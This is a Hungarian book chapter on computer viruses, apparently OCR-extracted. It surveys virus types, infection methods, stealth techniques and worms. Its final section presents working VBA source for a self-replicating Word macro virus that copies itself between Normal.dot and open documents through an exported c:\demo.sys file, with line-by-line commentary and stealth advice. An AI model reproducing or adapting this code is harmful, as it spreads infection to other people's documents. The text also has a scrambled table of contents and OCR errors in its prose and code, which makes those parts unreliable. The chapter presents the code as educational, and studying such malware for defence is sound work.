2 5.Tartalom 5.5.4.3 Vírusok kontra ServiceRelease 5.4 Modul makrók 5.3.2 Companion vírusok 5.3 A vírus felépítése Hogyan fertőz meg a vírus egy fájlt? 5.1.1 Alapok 5.4 A legfontosabb vírustípusok rövid áttekintése 5.4.3.11 Férgek .4.12 Időzítők 5.1 Így fertőznek a bootszektor vírusok 5.5 Ilyet is lehet: a vírus egy Payload-ot hív meg .5.5.2 Miről ismeri fel a vírusvizsgáló a vírust? 5.az ILOVEYOU és társai 5.4.4.4.4 Logikai bombák 5. fejezet .5.4.5.6 Hálózati vírusok 5.7 Polimorf vírusok 5.1.a Normal.4.2 A dropper vírust helyez el 5.4.1 Bootszektor vírusok 5.5.1 Defektes cluster mint álcázás 5.4.3 Killerprogramok 5.2 Modul vagy osztálymodul? 5.4.az elvetemült támadók búvóhelyei? 5.4.1 Minden ténykedés központja .5 Makrovírusok 5.dot fájl 5.5 Word makrovírus írása 5.8 Stealth vagy rejtőzködő vírusok 5.1.9 TSR fájlvírusok 5.3 Videokártyák .10 Update vírusok 5.

6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg 5.4 A vírusvédő program kiválasztásának a szempontjai .5.8.5.7 A vírus jelszóval védi a fájlt 5.7.7.142 A működési mód 5.1 Szkennermodul 5.8.8 Hogyan működnek a vírusvizsgálók? 5.kommentárokkal 5.6 5.7.8.4 A forrás .2 Víruspajzs 5.8.7.3 Hogyan tudott a féreg elterjedni? 5.7 Megfertőzött osztálymodulok ILOVEYOU 1385.5.3 „Fertőtlenítő" 5.1 Mi az a féreg? 5.

Ezután a vírus mailben fogja elküldeni magát. az FBI egy eljárást fejleszt. hogy a kemény kódolóprogramok az exporttilalom ellenére is elterjedtek. hogy kódolás közben kvázi kukucskál a felhasználó válla fölött. Doktori disszertációjához fejlesztette ki az önmagát reprodukáló program elméletét. Egy Magic Lantern nevű szoftver segítségével az FBI specialistái a jövőben egy olyan vírust tudnak becsempészni a gyanús szerverekre. a vírus minden billentyűzet-bevitelt feljegyez..5 Vírusok . A US-hatóságok szemében már régóta tüskét jelentettek az erős kódolásra alkalmas programok. Csak miután az ipar bizonyítékokat szerzett arról. úgy. amely megteremti a dekódolás előfeltételeit. és elküldi az FBI-nak. Az általa .1 Alapok Az FBI kódolás elleni vírust fejleszt Minden eszközzel a potenciális terroristák ellen . amellyel a kódolt adatokat már a keletkezésük helyén dekódolni lehet . mivel az ezekkel kódolt adatokat nem lehet viszszafejteni. Az amerikai szövetségi rendőrség. mielőtt még az adatok kódolása megtörténne. A Magic Lantern azelőtt kezd működni. 1983-ban programozta az első hivatalosan ismertté vált vírust Fred Cohan a dél-kaliforniai egyetemről. Az FBI-nak sok szerverrel nem lesz nehéz dolga. az USA fel adta a hivatalos ellenállást..jelenti az MSNBC. és rögtön bizonyítékkal is szolgált.com online média.Veszélyes fájlok 5. Ha a fertőzött számítógépeken elindítanak egy kódolóprogramot. vagy ismert biztonsági réseken becsempészi magát a szerverszoftverbe.

amelynél a kórokozók átterjednek egyik egyedről a másikra. Az újságokban és a televízióban újra és újra horrorisztikus híreket hallani új és veszélyes vírusokról. Ártalmatlan esetben itt található az utasítás.1. Ezért egyetlen vírus sem tud közvetlenül a videokártya memóriájából a számítógép végrehajtható memóriájába kerülni. ami csak egy kis tréfát csinál. fel lehet használni egy meghatározott vírus kereséséhez az adathordozón. fertőzött-e már egy fájl. és a vírus arra használja. 5. A második rész tartalmazza a tulajdonképpeni fertőzőrutint. akkor vírusellenőrzést kell végezni. A valóságban jelentősen több kár éri a számítógépes rendszereket és az adataikat szabotázsoktól. hogy a vírus a program indításakor azonnal aktiválódni tudjon. végrehajtható fájlt keres. hogy a vírus mondjuk x napon rajzoljon egy képet a monitorra. vagy írjon ki egy meghatározott szöveget. amely még nem fertőzött. A legtöbb esetben a szoftver vagy egy meghajtó hiányosságáról van szó. amelyek hasonló körülmények között eddig nem léptek fel.programozott vírus Unix operációs rendszer alatt futott. hogy felismerje. 5. Ha talál ilyet. az adatokat csak tárolja. Ez történhet egy olyan fertőzött program elindításával. mintha egy képről. Persze nem vezethető vissza vírusra a számítógéppel történő munka során fellépő hibák mindegyike. Ennek ellenére óvatosnak kell lenni: ha hirtelen olyan hibák jelennek meg. A vírus befészkelődik az adathordozó egy tetszőleges helyére. Gyakran éppen az ártalmatlannak vélt fájlok okozzák a legnagyobb károkat. egy Word vagy egy Excel fájlról lenne szó. hogy a rendszer minden felhasználója megkapott minden elérési jogot. ami jelentős anyagi károkat okoz. Hogy az Offíce-alkalmazások makrovírusai milyen veszélyesek lehetnek. Fertőzésnek az orvostudomány azt a folyamatot nevezi. 5. vagy csak jelzik a hibát. amelyet interneten. hogy ártalmatlan vírusról van-e szó. . Az esetleges álcázási eljárás szubrutinja is itt található. A videokártya memóriáját a vírus legfeljebb egy azonosító tárolására használhatja.a lemez egy fertőzött bootrutinjával. amely szükség esetén úgy alakítja át a fájlt. az kiderül a későbbiekben.1. hogy meg van-e már fertőzve egy fájl.3 Videokártyák az elvetemült támadók búvóhelyei? A videokártyák gyakran állnak vírushordozó gyanújában. itt is az átviteli folyamatot nevezik fertőzésnek. Itt először egy szubrutinról van-e szó. a vírus bemásolja a programkódját a fájlba.4. amelyek védik őket a lelepleződéstől. Ezek azonban többnyire erőteljes túlzások. és az elfoglalt clustert (helyfoglalási egységet) hibásnak mutatja. Mivel a komputervírusok a biológiai vírusokhoz hasonlóan viselkednek. Ennek a segítségével tudja bármikor ellenőrizni. A harmadik rész dönti el. például egy merevlemezre kerül. amelyről a vírus felismeri önmagát. a szakszerűtlen kezeléstől vagy a hackertámadásoktól. CD-n vagy lemezen keresztül lehet kapni. vagy egy destruktív kártevőről. A vírus az egyik vírushordozóról egy másik potenciális vírushordozóra. a hex-pattern. A program általában álcázva van.1 Defektes cluster mint álcázás A vírusoknak többnyire álcázómechanizmusaik vannak. A vírusok állítólag a kártya videomemóriájába fészkelik be magukat.2 A vírus felépítése Minden vírus három vagy gyakrabban négy programrészből áll: az első rész egyfajta ismertetőjegy.2 Miről ismeri fel a vírusvizsgáló a vírust? Minden vírusnak van egy jellemző bitmintája. Ez hexadecimális karaktereknek egy 10-16 bájt hosszú láncából áll. De ez a hely tartalmazhatná azt a parancsot is. és a megmaradt tárterületet mutatják meg. Ebben a részben található a programkód is. mint a vírusoktól és következményeiktől. A hatása az volt. vagy .a bootszektor vírusoknál . Az egyik ilyen mechanizmus például megakadályozza. Egy vírustámadás következtében azonban bizonyos körülmények között minden adat és program elveszhet. hogy a felhasználó felfedezze a vírus elfoglalta tárterületet a merevlemezen. Ha ez a hex-pattern már ismert. mert egy EXE fájllal sok felhasználó már eleve óvatosan bánik. hogy: „a következő újraindításnál formattáld a merevlemezt". A legtöbb felhasználói program (tehát a vírusvizsgálók is) egyszerűen átugorják a hibás clustereket. A keresés csak az önmagukat kódoló vírusoknál válik problematikussá. amely közepes vagy nagy katasztrófát vált ki. 5. Valójában ez lehetetlen: egy videokártya videomemóriája nem bootképes.

Ha a programot elindítják. A vírus ezen a módon olyan lemezeken is terjedhet. Ha a gép indításkor a bootszektorhoz ér. a betöltőprogram csak egy jelzést küld a képernyőre: nem rendszerlemez. az a saját feladatainak a futtatása előtt először a vírusprogramra ugrik. az elejére pedig egy hivatkozást tesz erre a kódra. akkor ez viszonylag észrevétlenül történhet. Felhasználóként legfeljebb a fertőzött program indulási sebességének a minimális változását vesszük észre. akkor kompletten átírja a fájlt. 5. amennyi helyre szüksége van. Többnyire a mailektől óvnak. Az ilyen vírusok a hajlékonylemezek bootszektorát és/vagy a master boot recordot (MBR). Az alábbiakban egy rövid áttekintést adunk a legfontosabb vírustípusokról és sajátságaikról. 5. a vírusokat el lehet távolítani. Más vírusok átírják a FAT-ben található könyvtárinformációt. Az eredeti címeket a vírus egy rendezett listára helyezi. A víruskódnak ez a fájlhoz fűzése nem okoz maradandó károsodást a fertőzött fájlon. illetve DOS-bootszektort fertőzik meg a merevlemezen. megint visszaugrik arra a helyre. és egyszerűen átírnak a fájlból annyit. majd az továbbítja az elérést a helyes címre. Egy bootszektor vírus a következőképpen terjed. mint a vendéglátója. Most már minden alkalommal. egy vírust telepít a memóriába. akkor ez először elindítja a vírust. Emellett vannak még hibrid vírusok is. és minden programnál a vírusprogram címét adják meg.1 Bootszektor vírusok A leggyakrabban fellépő vírusok az olyan bootszektor vírusok. ahol eredetileg megszakította a folyamatot. mert a „fertőzésveszély" a típustól függően nagyobb vagy kisebb. Ha a gazdaprogram.3.2 A dropper vírust helyez el A dropper nem vírus. a helyére pedig a saját betöltőprogramját írja.1 így fertőznek a bootszektor vírusok A vírusok egy másik típusa áthelyezi az eredeti bootszektort.4 A legfontosabb vírustípusok rövid áttekintése A vírusfigyelmeztetések szinte már a napi rutinhoz tartoznak az interneten. amennyire a programkódjukhoz szükség van. Ez egy rutin. nem is vírussal fertőzött program. mint a vírus. amely utasítja a BlOS-t az operációs rendszer betöltésére. 5. és ettől a perctől kezdve még meg nem fertőzött fájlokat keres. a fájl. . Több módszer kombinációja is gyakran előfordul. amelyek nem tartalmaznak programokat. Ez fontos. és megfertőzze őket. mint a Form és a Stoned vírus. amelyeknek a fájlmelléklete vírust rejt. Ha egy programot elindítanak. Ha a bootolási kísérletnél nem talál operációs rendszert. csak fájlokat. ahogyan a vírus beveszi magát egy programba. Az ilyen figyelmeztetésekben általában azt is megadják. Egyes antivírus-programok megkísérlik a dropperek felismerését. a DOS boot recordot.4. hogy milyen vírusról van szó. A vírust az ilyen lemez is hordozhatja. mivel a nem bootképes lemezeknek is van egy minimális bootszektoruk. ugyanolyan méretű vagy nagyobb. a merevlemezre vagy egy fájlba. először a vírus indul el. és annyival meghosszabbítja. és ezután áttereli a beolvasást az átültetetett eredeti bootszektorra.3. mikor a programot elindítják. ezért is lehet egyre nehezebben osztályozni a vírusokat. Minden fertőzésmódnak létezik néhány variánsa. illetve a master boot partíciós szektort vagy a DBR-t. 5.3 Hogyan fertőz meg a vírus egy fajit? A fájlok megfertőzésénél a legnagyobb különbségek a módban vannak. 5. Ha a vírus nagyobb. A droppereket egy bizonyos vírus átvitelére alkalmas programként vagy egyszerűen egy szabotázs segédeszközeként írják meg. Ha ezt végrehajtotta. s az újabbaknak ez általában sikerül is. hogy azokhoz is hozzáférkőzzön. a vírus pedig elrejtőzik valahol az adathordozón. Sok vírus egy futtatható fájl végéhez fűzi a saját programkódját. amelyek a bootszektort és a fájlokat is meg tudják támadni. Itt található az a parancs. ahol a vírus megszakította a program futását. a vírusbetöltő először a vírust indítja el.A negyedik résszel zárul a kör. Egyes vírusok azonban sokkal gátlástalanabbul viselkednek. amellyel a program a víruskód végrehajtása után visszatér oda. ám ha lefut.

rátelepszik a 13h interruptra. A fertőzött flopik bootszektoráról kerülnek fel a gépre. Betölti a lemez első szektorát a memóriába. hogy az EXE fájl egyáltalán nem változik. és a BIOS-ban Boot from Floppy van beállítva: tehát a számítógép megpróbál erről a lemezről elindulni. második lehetőségként pedig meg lehet adni a CD-ROM meghajtót. hogy úgy tűnjön. tehát kioldjuk a meghajtózárat. még ha ez a kísérlet sikertelen is lenne. mikor megtudják. A vírusvizsgálók. 5. de az alapelv mindegyiknél ugyanaz. a valóságban a vírus ír a lemezre) megvizsgálja a lemezt.2 Companion vírusok Ha egy COM és egy EXE fájlnak ugyanaz a neve. például készített egy újabb companion vírust egy újabb fájlhoz. hogy lefuttassa a kódot. vagy hogy milyen vírusvédő programot telepítettek rá. ami bekerül az A: meghajtójába. A lemezt behelyezzük az A: meghajtóba. A vírus memóriarezidenssé válik. amely egy rögzített értéktől kezdve visszaszámol. amelyek bizonyos számú fertőzés után tönkreteszik a fertőzött gép merevlemezét. Eddig a vírus még semmit sem csinált. és innentől kezdve az indítási folyamat a megszokott módon folytatódik.4. A fertőzés csak a fertőzött lemezről történő indítási kísérletnél következhet be. 5. amelyeket kapunk. kicseréli magára az MBR-t. Volt néhány igazán sikeres companion vírus. azonban nem tudja. mikor a bootszektor vírus telepíti magát. Mivel azonban fogja a flopiról olvasás/flopíra írás interruptját. Sokan meg vannak lepve. Semmi jelentősége nincs annak. hogy milyen operációs rendszert használ a gép. Ez a flopi azonban Stoned vírussal fertőzött. mint azt egy döbbent Unix-felhasználó megtapasztalta. az adathordozóról történő olvasás és írás interruptjára. így a gépünk most minden lemezt megfertőz. és elkezdjük használni az adatait. március 6-án a Michelangelo vírus meglepetésszerűen lecsapott a gépére. A következő reggelen újból bekapcsoljuk a számítógépet. a vírusprogram minden A: meghajtóra/-ról irányuló írási vagy olvasási műveletnél (habár azt gondoljuk. és ezt a nevet begépeljük. hogy egy vírus terjed. ami mostanra azonban már nem más. és ha még nincs megfertőzve. és a vírus programja lefut.3 Killerprogramok A killerprogramok olyan vírusok.Kapunk egy flopit adatokkal. A vírus erre a célra egy fertőzésszámlálót tartalmaz. amelyben benne van a víruskód. a BIOS-t még mindig át lehet állítani egy tiszta(!) lemezről bootolásra. a folytatáshoz üssünk le egy tetszőleges billentyűt amennyiben nem talál rajta DOS-rendszerfájlokat. a PC ugyan megfertőződík. olvasásról van szó. működési módjuk miatt. Az elrejtéshez gyakran a rejtett vagy a rendszer tulajdonságot adják a fájlnak. vagy hogy kiírja: Nem rendszerlemez. a vírus azonban nem tudja a gépbe helyezett lemezekre másolni magát. ennek ellenére gondosan ellenőrizzük vírusvizsgálóval. és ebben keresendő a bootszektor vírusok gyakoriságának az oka is. mint a Stoned vírus. A bootszektor vírusok PC-ket támadnak meg. tehát a vírus fut le.4. A companion vírusok is ezt a körülményt használják ki. Az. Egyes operációs rendszereknél. minden a legnagyobb rendben működik. A boot-támadás idején azonban tehetetlenek. A lemez még az A: meghajtóban van. az EXE fájlhoz készítenek egy azonos nevű COM fájlt. előbb vagy utóbb pedig tovább adjuk ezeknek a lemezeknek valamelyikét. amelyek a vírussal fertőzöttek. A lemezeket. és ezzel a körforgás elölről kezdődik. az operációs rendszer vagy a védőprogram még egyáltalán nincsen betöltve. hogy a számítógépe és ezáltal a lemez is bootszektor vírussal fertőzött. hogy egy vírus ilyen módon terjed. elindítja az EXE programot is. helyette a COM program. Ha ezután elindul a gép a merevlemezről. és az eredeti MBR-t a merevlemez egy más pontján helyezi el. akitől a lemezt kaptuk. A vírusprogramozónak az a fő előnye. és csak így lehet őket továbbadni (egy bootszektor-vírus nem tud például a hálózaton keresztül terjedni). Ajánlott a számítógép fő bootszekvenciáját úgy beállítani a BIOS-ban. amit tartalmaz. Telepíti magát a merevlemezre. Ha a vírus befejezte a ténykedését. és így a megváltoztatott programok némelyike egyáltalán nem is veszi észre. Ha ezután megpróbáljuk elindítani az EXE fájlt. és így nem tud terjedni. hogy először mindig a merevlemezről próbáljon bootolni. Ha egy merevlemez-problémánál a bootolás lehetetlenné válna (headcrash vagy hasonló). mikor 2000. Kárt azonban ugyanúgy okozhat ezeken a gépeken is. lefut az MBR. installálja a Stoned vírust a bootszektorába. csak a lemezek vizsgálatakor tudják felismerni és törölni a bootszektor vírusokat. mert abban a pillanatban. a DOS először mindig a COM fajit hajtja végre. Ezeket az intéző alapértelmezésben nem mutatja. és lenyomunk valamilyen billentyűt. Valamikor kikapcsoljuk a számítógépet. nehogy másoknak okozzanak károkat továbbadáskor. Ha eléri . de nem sok. Ezt az üzenetet már ezerszer láttuk. amelyek nem DOS-alapúak. A különböző bootszektor vírusok működési módjai a részleteikben ugyan különböznek egymástól. és ezután betölti az eredeti MBR-t.

Ez azonban a valóságban sokkal bonyolultabb.4 Logikai bombák A logikai bombák a vírusok különleges fajtái: ezeknek a működésbe lépését kiválthatja egyfajta időzítő vagy egy feltétel teljesülése. Egyes esetekben a vírus ilyenkor kiadja és lefuttatja a FORMÁT C: parancsot. és ezért ezen a környezeten kívül hatástalanok. és végrehajt egy fertőzött fájlt. Mivel ezek minden rendszerben mások. azonnal viharos sebességgel el is terjed rajta. hanem önállóan tudják reprodukálni a saját kódjukat. A különböző címjegyzék-bejegyzéseken keresztül a vírus gyorsan eljut az üzletfelekhez. Az ILOVEYOU a maga idejében pontosan ilyen vírus volt.. amelyek több operációs rendszerben is tudnának terjedni. 4. belátható időn belül aligha lesznek olyan vírusok. az a későbbiekben fog kiderülni. amelyek ezáltal ugyancsak megfertőződnek. és önálló programként tudják lefuttatni magukat. az megfertőzi a Normal. ez azt jelenti. és futtatják a ferőzött fájlokat.. „B" kolléga több más programot futtat saját. mert ez a vírustípus csak flopin keresztül terjed. amint bekerül egy hálózatba. kiváltja a rombolóakciót. Hogy a makrovírusok hogyan működnek. azonban a legtöbb vírus hálózaton is tud terjedni.. „D" és „E" kollégák bejelentkeznek. hálózatra csatlakozó számítógép fertőzött. ezek is megfertőződnek. Másképp történik a fertőzés az olyan vírusoknál. „A" kolléga megfertőzi a számítógépét. „A" kolléga néhány programot a hálózaton futtat.4. 6. A vírusok. Olyan vírusok. barátokhoz stb.4.6 Hálózati vírusok Speciális hálózati vírusokból még kevés van. A hálózat egy DOS-eszközt emulál. A legbarátságtalanabb változat a FAT bejegyzéseit változtatja meg.4. 5. még nincsenek. Makrovírusokat jellemzően Microsoft Word dokumentumokban (. a felhasznált programnyelv alapján adatokat tudnak törölni vagy módosítani.dot fájlt.doc vagy . amelyek elküldik magukat a mail-címjegyzék minden címére. A legtöbben azt hiszik. „B" kolléga bejelentkezik a szerverre. 3. „A" kolléga további programokat futtat a merevlemezén. az is megfertőződik a vírussal. 7. A vírus „B" kolléga gépén is memóriarezidens lesz. A vírus memóriarezidenssé válik. még akkor sem. A makrovírusok például egy másikra tudják cserélni a Mentés parancsot. Más sajátosságai mellett saját magát szaporította. például egy bizonyos szó vagy felhasználói név beírása vagy hiánya. amelyek adatfájlokat fertőznek meg.dot végződéssel) és már Excel fájlokban is találunk. ha több. hogy a szerveren is meg tudjon fertőzni fájlokat. Itt elég. Ilyenkor minden fájl ott marad ugyan a merevlemezen. Ha ezek a kollégák ugyancsak megnyitják a mellékletet. „C".és így tovább. és milyen trükköket vetnek be álcázásként. . a koncepciójuknál fogva. mindig egy rendszer gyenge pontjaira vannak kihegyezve. 5. 5. A vírusnak tehát nem kell a szokásostól eltérően viselkednie ahhoz. minden kezdődik elölről. 2. Más vírusok minden fájlt törölnek az adathordozón.5 Makrovírusok A makrovírusok olyan vírusok. A klasszikus hálóvírusok az úgynevezett férgek. milyen parancsokat tudnak kiváltani. ha „A" kolléga lefuttatja a fájlt. Valamennyi végrehajtott fájl megfertőződik. és a címjegyzékéből minden kollégája kap egy mailt a vírussal. helyi merevlemezén és a szerveren. és így lavinát vált ki.a nullát. Ezek a vírusok többnyire egy meghatározott rendszerre korlátozódnak: a bombák rendszerint csak egy megadott környezeten belül tudják reprodukálni magukat. Amint megnyitunk egy fertőzött Word dokumentumot. Először is a bootszektor vírusok nem tudnak hálózaton keresztül terjedni. Ha ezután egy dokumentumot mentünk vagy nyitunk. Ezek a vírusok nem programfüggelékként terjednek a rendszerekben. és minden rendszer más programozási követelményeket állít. valószínűleg egy e-mail mellékletével vagy egy barátja demólemezével. csak az adatállomány többé nem olvasható és használható. Még kompu- . mint lokálisan. 5. hogy fájlok olvasása és írása ugyanolyan módon történik a szerveren. A fájlvírusok ezzel szemben a következőképpen fertőznek hálózaton keresztül: 1. hogy egy vírus. amelyek például Mac és MS-DOS gépeken is tudnának működni.

akkor ezzel nem fertőz újra. amelyik ezzel a trükkel dolgozott.az ILOVEYOU és társai A komputerférgek olyan programok. 5. hogy a vírus fellépett-e már valamely verziójában. A hex pattern mellett ezek a vírusok nemcsak egy verziószámot tartalmaznak. hogy megfertőzze. Egyes vírusok overlay fájlokat (programok lapozófájljai) fertőznek meg. és ezeket többnyire egyetlen programozó vagy egy csoport fejleszti.11 Férgek . Ezeknél nem klasszikus vírusról van szó. 5. amely ellenőrzi.10 Update vírusok Az update vírusok különösen ravasz kórokozók. A komputerférgek saját magukat tudják reprodukálni. Mint a neve is mutatja. az ilyen típusú vírus fájlokat támad meg. Ha újabb verzió van telepítve. azok közül is általában a COM és az EXE . Egyes vírusokat gyorsan fertőző vírusoknak is neveznek. amely a víruskódok egy bizonyos repertoárja után kutat. hanem egy update rutint is. amelyeknek nincs szükségük arra.9 TSR fájlvírusok A második leggyakoribb vírusfajta a TSR fájlvírus.4. amely a fájlt olvassa. aki el akarja csípni. Az 1986-ban készült Éráin vírus volt az első olyan. 5. amelyek ugyanazt a bájtsorozatot tartalmaznák. A férgek önálló programok.8 Stealth vagy rejtőzködő vírusok Ha egy vírus memóriarezidenssé tud válni. és minden további futtatás ismét elindította a küldést. akkor lecseréli ezeket. A polimorf vírus olyan kártevő. akkor legalább egy interruptot fogni tud. ami pedig a komputeres világban megjelenő vírusok 99%-ára igaz.) Az első gyorsan fertőző vírus a Dark Avenger volt. A Green Caterpiller fertőzőrutinját viszont minden olyan folyamat kiváltja. ha csak megnyitjuk azt (például egy adatmentésnél bizonyos körülmények között minden fájlt megnyitnak. A vírus memóriarezidenssé válik. Az ilyen vírusok már akkor megfertőznek egy fájlt. Családokra oszlanak.4.4. akkor az a 13h interruptot használja (az adathordozók olvasása/írása). Használnak még más fertőzőrutinokat is. hogy milyen fájlok állnak rendelkezésre az adathordozón (pl. hanem azzal rokon zavaróprogramokról. és aztán a fertőzött bootszektor helyett az eredeti tartalmát prezentálom. ezek az *. amely meghatározza.4. A fájlvírusok. és általában minden utána elindított programot megvizsgál. itt valaki látni akarja a bootszektort. fájlokat. A stealth vírusoknál viszont. és hálózati funkciók segítségével más számítógépekre másolódnak." Ezáltal a lekérdező programnak semmi szokatlan sem tűnik fel. amelyek azonban vírust is tartalmazhatnak. egymáshoz kapcsolódó programszegmensből állnak. Ezért egy ilyen vírust nem lehet egyszerűen egy meghatározott bájtsorozatról felismerni. amikor végrehajtják. hogy minden program. 5. bár ez az esetek 99%-ára igaz. hogy egy TSR vírus terjedni tudjon. A vírusprogramozó ezt a programot szeretné a legjobban becsapni. mert a mailforgalom egyfolytában növekedett. Ha igen. amelyből egy helyen nem fordul elő két másolat. mint amilyen a Frodo. mert egy bootszektor vírushoz sokkal egyszerűbb álcázórutint írni. Ahhoz. a DIR parancs). és a végrehajtható programoknak sem feltétlenül kell COM vagy EXE kitérjesztésűeknek lenniük.4. amit a meghajtó tartalmaz. ha az még nem fertőzött. valakinek le kell futtatni a fertőzött programot. hogy gazdaprogramokhoz fűzzék magukat. de a legtöbb esetben egy program csak akkor fertőződik meg.tercégeknél is egész részlegeket bénított meg. a vírus azt mondja magában: „Aha. mint fájlvírusoknál. hasonló trükkel szintén el tudják titkolni a létezésüket úgy. amelyek önállóan tudnak egy hálózaton terjedni. csak azokat a bájtokat látja. Egyszerűen beolvasom az eredeti bootszektort onnan. ha egy tetszőleges program megpróbálja olvasni a bootszektort. Többnyire több. azonban van néhány eszközmeghajtó vírus is. De ez még nem minden: a rutin azt is megvizsgálja. Ha bootszektor vírusról van szó. 5. Az ilyen álcázási képességek azonban gyakrabban figyelhetők meg bootszektor vírusoknál. Hi-hi. hogy a fájlok tartalmazzák-e már a vírus egy régebbi verzióját. amelyeket az a vírusfertőzés előtt tartalmazott. ennél sokkal összetettebb és nehezebb feladatot kell megoldania annak.7 Polimorf vírusok Az antivírus programok leggyakrabban használt fajtája a szkenner.OVL fájlok. ahová eltettem.

amelynek a sablonjában makrók voltak. amelyeket bárhol újra elő lehet venni.3 Vírusok kontra ServiceRelease Az SR-1 a Microsoft egy ServiceRelease-e.Count . hogy Modulról vagy Osztálymodulról. valamennyire módosított formában.4 Modul makrók Az alábbiakban megtalálható minden.VBComponents. A naptári dátumok mellett olyan rutint is lehet használni. 5. Ha a Word fájlok makrót tartalmaznak. amelyek azután minden dokumentumra érvényesek. Sub AutoCloseQ For I = 1 To NormalTemplate. 5.5. Egy modul elkészítéséhez az Eszközök/Makró/Visual Basic-kel megnyitjuk a Word makroszerkesztőjét.12 Időzítők Az időzítők a vírusok speciális kioldómechanizmusai. hogy milyen trükkökkel álcázhatják a programozók a programjaikat. A vírusprogramon belül egy rutin lekérdezi a rendszeridőt. Attribute VB_Name = "demo" On Error Resume Next Application. hogy a Wordot megfertőzzék. vagy kétkedőn a tiltásukat választotta.Export "c:\demo. ugyanabban az órában indul el. VBE. Elméletileg így például születésnapi üdvözletet lehet valakinek küldeni. A következő oldalakon sok minden kiderül a Word makrovírusok programozásáról. Itt különösen fontos tudni. A VBA lassú. A feltétel lehet a bekapcsolástól számított időtartam vagy egy előre meghatározott dátum. de biztosan nem volt a tudatában annak. a Normal. annak nagyon egyszerű a makrók írása. hogy mindenki látta már a Word megerősítő kérdését. kiváltja a vírus akciótartalmának a végrehajtását. ezért kell a fertőzéshez a Normal.5 Word makrovírus írása Biztos.5. nem pedig megvalósítás céljára. amire egy Word makrovírushoz szükség van. de hatalmas. amely a szóban forgó napon automatikusan elindul. már megérte az ismertetés. a vírusspecialista Aciidfreak útmutatója. Ezekbe kerülnek az önálló projektrészek. és milyen potenciális veszélyeket hordoznak ezek. Lehet. amit a VB alatt is használni tudunk.dot-ból minden. még nem fertőzött DOCfájlba. akkor ezek a fájl megnyitásakor rendszerint ugyancsak megnyílnak és aktívvá válnak.dot-ot.sys" 5. VBComponents(" demo"). hogy a makrók engedélyezésére kattintott. Itt a Beszúrás menüből kiválasztjuk.ActiveVBProject. Íme.5.dot-ba másolni a makrovínisokat.a Normal.dot fájl A Word minden indításkor betölt egy globális fájlt. de egy vírusíró erre mindig talál megoldást. hogy milyen veszély bújik meg mögöttük. Ha az elér egy rögzített értéket. Ez a makrovírus alapÖtlete. Ezt a fájlt támadják meg. Aki tud VB-ben programozni. Ez a kérdés azonban csak erre a dokumentumra érvényes.1 Minden ténykedés központja .5. esetleg UserFormról lesz-e szó. és minden API-funkciót is ismer (API = Application Programming Interface).5.2 Modul vagy osztálymodul? A vírusok mindig egy osztálymodulban vagy egy modulban vannak.4. 5. Ebben a fájlban lehetnek a makrók. Az időzítők feltételeinek a választéka szinte határtalan. 5. de hangsúlyozzuk. Minden parancsnak a birtokában van. a modulok és az osztálymodulok a fontosak. amely a WordBasicben elérhetetlenné teszi a MacroCopy és Application OrganizerCopy parancsokat. amely minden nap. ha valakitől egy olyan dokumentumot kapott.VBProject. Ha ezzel valaki meg tud úszni egy Word makrovírust vagy legalább felismeri azt. Először a modulokban lévő makrovírusokkal foglalkozunk. hogy az egészet csak tájékoztatásnak szánjuk. és a Normal. hogy aktiválja-e a makrókat is. A UserFormok a makroprogramozás szempontjából nem érdekesek. De a Word idegen szövegeknél megkérdezi.

Application. hogy mire lett állítva a Dobj. ezenkívül a Normal. mint a vírusé). If ActivInstall = True And Normlnstall = False Then Set Dobj = NormalTemplate. Hogy melyik fájlba lesz csomagolva. Annyiszor ismétli az utána következő kódot. If NormalTemplate. hogy később kiváltsa az aktív dokumentumba importálást. Dobj. VBComponents. VBProject Itt a feltétel fordítva is átfut: Ha a Normal. Attribute VB_Name = "demo" A Demo a modul neve.dot-on keresztül célzottan másolni is lehet a makrókat. Annyiszor ismétli meg a For és a Next közötti kódot. True-ra állítja az Activlnstall-t.sys fájlba exportálja. Az álcázás . VBComponents.sys" A modult a C\demo.Count Ez egy For ciklus. VBProject Ha az aktív dokumentumban. hogy később melyik fájlba importál: vagy a Normal.Import ("c:\demo.VBProject. On Error Resume Next Ez esetleg a VB-ből már ismert. VBCpmponents(I).VBComponents(I). VBComponents(I). ezt most fogjuk most darabokra szedni. VBProject Dobj. For I = 1 To ActiveDocument. hogy később lehetőleg egy fertőzendő fájlba lehessen importálni. az attól függ. Else If ActivInstall = False And Normlnstall = True Then Set Dobj = ActiveDocument. akkor a Dobj NormalTemplate.VBProject. ami elárulná a vírust. És a modul neve általában a vírus neve. Most néhány funkció következik. For I = 1 To NormalTemplate.Name = "demo" Then ActivInstall = True Ha az aktív dokumentumban van egy modul. VBProject-re lesz állítva.Name NormInstall = True Next I = "demo" Then For I = l To ActiveDoctiment.VBProject. Next I A For cikluson belül a következő értékre lépteti a ciklusváltozót. ahelyett. Count Ez egy For ciklus.dot-ban vagyunk.VBProject. VBProject_ Else If ActivInstall = False And Normlnstall = True Then Set Dobj = ActiveDocument. vagy az aktív dokumentumba. akkor a Dobj-t NormalTemplate.ActiveVBProject.dot-ba. VBProject. és nem a Normal. amelyek automatikusan végrehajtódnak: például AutoOpen. hogy hibaüzenetet írna ki.sys") End Sub így ni. VBProject.If NormalTemplate.dot-ban és nem az aktív dokumentumban vagyunk.Export "c: \demo. VBProject-re állítja.dot-ban. Ha hiba lépne fel. ahány modul van a Normal.Name = "demo" Then ActivInstall = True Next I If ActivInstall = True And Normlnstall = False Then Set Dobj = NormalTemplate. ahány modul található az aktív dokumentumban. VBComponents. egyszerűen a következő parancsot hajtatja végre. Next I A For cikluson belül a következő értékre lépteti a ciklusváltozót.Count If ActiveDocument. amelynek a neve „demo" (tehát. amit demo-nak hívnak (tehát a vírus). Itt rögzíti. VBComponents ("demo").dot-ban van egy modul.VBComponents. Sub AutocloseQ Ez a sub minden alkalommal lefut. Vannak még más autofunkciók is. True-ra állítja a NormalInstall-t. ha egy dokumentumot bezárnak.VBComponents. AutoExit.stealth A Word alapértelmezésben megmutat egy modult a VB Editorban. IfActiveDoaiment.Import ("c: \demo. VBE.sys") Itt importálja az elején exportált fájlt (a vírust).Name = "demo " Then Normlnstall = True Ha a Normal.VBCpmponents(I). Az álcázáshoz . amelyeket be lehet építeni. Ebben a fájlban benne van az egész forráskód. VBProject. Autoexec.

